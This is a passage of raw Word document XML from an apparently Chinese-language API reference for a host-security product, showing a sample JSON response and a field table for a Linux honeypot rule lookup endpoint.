        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/detect/honeypot/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/rule/70db8ef89e9ae79a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CB709E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34AC2DF3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>agentId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "70db8ef89e9ae79a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>displayIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "172.16.159.1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>connectionIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "172.16.2.231",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>externalIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>internalIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "172.16.159.1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bizGroupId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bizGroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "未分组主机（Linux）",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "remark": "安装了</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>或者</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DNSmasq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hostTagList</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": [],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "hostname": "hostname",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "status": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>verifyStatus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "ports": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "port": 1112,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "status": 2</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "port": 80,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "status": 2</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        },</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "port": 8000,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "status": 2</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "port": 8080,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "status": 2</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6B80DE"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452"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="3451"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="6E29EA3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33BAA53" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33021EA6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="735EA0BE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10497C15" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7381490B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="590A85AF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03B77ECB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3187DAA8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="43DC3F9D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机ID，16位</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="42FCA421" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41DC1120" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>displayIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3289C248" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69EF0CD6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="12CC4EED" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="62D678B6" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71314B25" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>connectionIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B1CBD63" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="689A24A7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C7D0284" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>连接IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="69069D10" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58E1DA92" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>externalIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B8B07ED" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4FBBF6B9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78F4F923" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>外网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="44D711D6" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3DC457A3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>internalIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3062E67A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D309D20" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D08C76B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>内网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="313DB54D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09D420E7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bizGroupId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29FEEF72" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3434C4BA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>bigint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="676BE504" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="20BB7634" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27612590" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bizGroup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54EACFF1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F382718" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="384095B1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7DEECAFD" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="52B266A1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2118221B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35E123B3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="19236538" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5689BBA6" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4CEE4E36" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>hostTagList</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D3B42A9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15792D75" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64D18FE2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="063A7A42" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CF0B461" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3944EEB7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2486B787" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F3B6FBC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="742FB30D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C70EC3A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="63233407" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="588FCAE8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F68025F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>规则状态，0:规则启用 1:规则禁用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="70EA101B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64F4F0EF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>verifyStatus</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23CBDA5E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E84FDF2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F0F16CA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>同步状态，0:规则同步中 1:同步完毕</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2EB1726D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E78DC02" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>ports</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D9D30D6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72676219" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>见详细</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="032B498E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>规则端口</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
